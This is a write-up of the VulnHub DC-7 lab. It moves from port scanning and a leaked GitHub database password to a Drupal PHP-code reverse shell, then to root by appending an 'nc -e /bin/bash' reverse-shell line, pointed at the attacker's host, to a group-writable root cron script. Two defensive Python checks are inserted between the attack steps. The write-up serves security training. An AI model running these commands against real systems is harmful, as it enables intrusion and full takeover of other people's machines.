vulnhub: DC 7

Information gathering

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-methods: 
|_  Supported Methods: GET POST HEAD OPTIONS
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 00:0C:29:40:76:C6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.008 days (since Wed Sep  2 21:17:23 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports 22 and 80 are open, and the HTTP service is built on Drupal. Visiting the web page:


The page hints that brute forcing is not recommended and suggests looking for information outside the target machine. Searching for @DC7USER in a search engine:

Both GitHub and Twitter return a matching account. The Twitter account's bio reads:

This is a Twitter Account for the DC-7 challenge. There isn't really a lot here.

On GitHub, config.php contains the database username and password:

<?php
    $servername = "localhost";
    $username = "dc7user";
    $password = "MdR3xOgB7#dW";
    $dbname = "Staff";
    $conn = mysqli_connect($servername, $username, $password, $dbname);
?>
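The credential leak above is a committed config file, which is exactly what a repository secret scan is meant to catch before the push. The following is an added example, not code from the original post or from any tool the post uses: a small scanner for PHP assignments of quoted literals to variables whose names suggest a secret. The variable-name heuristic, the placeholder list and the second sample file are my own assumptions; the first sample is the config.php shown above.

```python
import re

# Variable names that commonly hold secrets in PHP config files.
# Assumption: this is my own heuristic list, not taken from the post or any tool.
SECRET_NAMES = re.compile(r"(pass(word|wd)?|secret|token|api_?key|private_?key)", re.I)

# Matches a PHP assignment of a quoted string literal, e.g.  $password = "MdR3xOgB7#dW";
ASSIGNMENT = re.compile(r"\$(\w+)\s*=\s*([\"'])(.*?)\2\s*;")

# Values that are obviously placeholders rather than live credentials (assumed list).
PLACEHOLDERS = {"", "changeme", "password", "xxx", "todo", "your_password_here"}

# Constructed sample 1: the config.php from the DC-7 GitHub account, as shown above.
SAMPLE_LEAKED = '''<?php
    $servername = "localhost";
    $username = "dc7user";
    $password = "MdR3xOgB7#dW";
    $dbname = "Staff";
    $conn = mysqli_connect($servername, $username, $password, $dbname);
?>
'''

# Constructed sample 2: the same file written the safe way, reading the secret
# from the environment and leaving only a placeholder literal.
SAMPLE_CLEAN = '''<?php
    $servername = "localhost";
    $username = "dc7user";
    $password = getenv("STAFF_DB_PASSWORD");
    $backup_password = "changeme";
    $dbname = "Staff";
?>
'''


def find_hardcoded_secrets(php_source):
    """Return (line_number, variable_name, masked_value) for each literal that
    looks like a committed credential. The real value is never put in the report."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for m in ASSIGNMENT.finditer(line):
            name, value = m.group(1), m.group(3)
            if not SECRET_NAMES.search(name):
                continue
            if value.lower() in PLACEHOLDERS:
                continue
            masked = value[:2] + "*" * (len(value) - 2)
            findings.append((lineno, name, masked))
    return findings


if __name__ == "__main__":
    for label, source in (("leaked", SAMPLE_LEAKED), ("clean", SAMPLE_CLEAN)):
        for lineno, name, masked in find_hardcoded_secrets(source):
            print(f"{label}: line {lineno}: ${name} holds a literal secret ({masked})")
```

Run as a pre-commit hook over staged `*.php` files, a non-empty result blocks the commit; the masked value is enough for the developer to recognise which literal tripped the check without the secret being copied into hook logs.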

Logging in over SSH with these credentials succeeds:

[C:\~]$ ssh 192.168.76.135


Connecting to 192.168.76.135:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.

Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
/usr/bin/xauth:  file /home/dc7user/.Xauthority does not exist
dc7user@dc-7:~$ whoami
dc7user
dc7user@dc-7:~$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

The current user's home directory contains an mbox file, which shows:

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
    (envelope-from <root@dc-7>)
    id 1i3LCo-0000Eb-02
    for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

A cron job runs /opt/scripts/backups.sh as root. It is a backup script that dumps the database and archives the web site files:

dc7user@dc-7:~/backups$ more /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

Its file permissions are:

dc7user@dc-7:~/backups$ ls -l /opt/scripts/backups.sh 
-rwxrwxr-x 1 root www-data 520 Aug 29  2019 /opt/scripts/backups.sh

So the plan is to obtain www-data through the web application, modify the backup script, and get root by any of several means (creating a root-privileged user, a reverse shell, and so on).
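The root cause here is a script that root's cron executes but that a non-root group (www-data) can write to. The following is an added example, not code from the original post: a check that takes the `ls -l` line of each script referenced by root's cron mail and reports every reason an unprivileged account could change what root runs. The first sample line is the one from the post; the other sample lines, the `Finding` class and the trusted-group list are my own constructions.

```python
import re
from dataclasses import dataclass, field

# One "ls -l" line: type+perms, link count, owner, group, size, three date fields, path.
LS_LINE = re.compile(
    r"^([-dl])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(/\S+)$"
)

# Subject line of a cron mail, e.g.  Cron <root@dc-7> /opt/scripts/backups.sh
CRON_SUBJECT = re.compile(r"Cron <(\w+)@[^>]+> (\S+)")

# Constructed sample lines. The first is the backups.sh line from the post;
# the rest are invented to exercise the other checks.
SAMPLE_LS_LINES = [
    "-rwxrwxr-x 1 root www-data 520 Aug 29  2019 /opt/scripts/backups.sh",
    "-rwxr-xr-x 1 root root 140 Aug 29  2019 /opt/scripts/rotate.sh",
    "-rwxrwxrwx 1 root root 88 Aug 29  2019 /usr/local/bin/cleanup.sh",
    "-rwxr-xr-x 1 dc7user dc7user 120 Aug 29  2019 /home/dc7user/sync.sh",
]


@dataclass
class Finding:
    path: str
    owner: str
    group: str
    perms: str
    reasons: list = field(default_factory=list)


def script_from_cron_mail(subject):
    """Return (user, script_path) from a cron mail Subject line, or None."""
    m = CRON_SUBJECT.search(subject)
    return (m.group(1), m.group(2)) if m else None


def audit_root_script(ls_line, trusted_groups=("root",)):
    """Given the ls -l line of a script root runs from cron, return a Finding
    listing why a non-root account could alter it, or None if it looks safe."""
    m = LS_LINE.match(ls_line.rstrip())
    if not m:
        raise ValueError(f"unrecognised ls -l line: {ls_line!r}")
    ftype, perms, owner, group, path = m.groups()
    reasons = []
    if ftype == "l":
        reasons.append("is a symlink; audit the target instead")
    if owner != "root":
        reasons.append(f"owned by non-root user {owner!r}")
    # perms is rwxrwxrwx: index 4 is the group write bit, index 7 the world write bit.
    if perms[4] == "w" and group not in trusted_groups:
        reasons.append(f"group-writable by {group!r}")
    if perms[7] == "w":
        reasons.append("world-writable")
    return Finding(path, owner, group, perms, reasons) if reasons else None


def audit_all(ls_lines):
    """Audit every line and return only the scripts that have a problem."""
    return [f for f in (audit_root_script(line) for line in ls_lines) if f]


if __name__ == "__main__":
    print(script_from_cron_mail("Subject: Cron <root@dc-7> /opt/scripts/backups.sh"))
    for f in audit_all(SAMPLE_LS_LINES):
        print(f"{f.path} ({f.perms} {f.owner}:{f.group}): " + "; ".join(f.reasons))
```

Two caveats the check does not cover: the directory holding the script must also be non-writable by others, since a writable directory lets the file be replaced rather than edited; and backups.sh passes the GPG passphrase on the command line, where any local user can read it from the process list while gpg runs. The fix for the DC-7 case is simply `chmod 755` and `chown root:root` on the script, so that www-data holds no write access to anything root executes.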

Reset the admin user's password (https://www.isfirst.net/drupal/drupal-reset-password):

dc7user@dc-7:/var/www/html$ drush user-login admin
default does not appear to be a resolvable hostname or IP, not starting browser. You may need to use the --uri option in your command or site alias to indicate the correct URL of this site.                                         [warning]
http://default/user/reset/1/1599091076/Z6q99HO2oKbTxsQ-5YwKlq7x58UaJ2FU_uoqkUha12M/login
dc7user@dc-7:/var/www/html$ 

This gives a one-time login URL; log in to the web UI and set the admin password to 123456:

Download the PHP module (https://www.drupal.org/project/php), upload it and install the PHP Filter module:

Create a new content item, insert the source code, and choose PHP code as the text format:

After saving, visit the resulting page:

The reverse shell connects back to Kali:

root@kali:/opt/test# nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.76.129] from (UNKNOWN) [192.168.76.135] 58752
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-7:/var/www/html$ cd /opt/scripts
cd /opt/scripts
www-data@dc-7:/opt/scripts$ cat backups.sh
cat backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

Append a reverse-shell command to backups.sh:

www-data@dc-7:/opt/scripts$ echo "nc -e /bin/bash 192.168.76.129 7777" >> backups.sh
<"nc -e /bin/bash 192.168.76.129 7777" >> backups.sh
www-data@dc-7:/opt/scripts$ more backups.sh
more backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
nc -e /bin/bash 192.168.76.129 7777


Listen on Kali and get root:

root@kali:/home/yurang# nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.76.129] from (UNKNOWN) [192.168.76.135] 38054
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-7:/var/www# whoami
whoami
root
root@dc-7:/var/www# cd /root
cd /root
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt
cat theflag.txt




888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@dc-7:~# 


posted @ 2020-09-04 00:49  豫让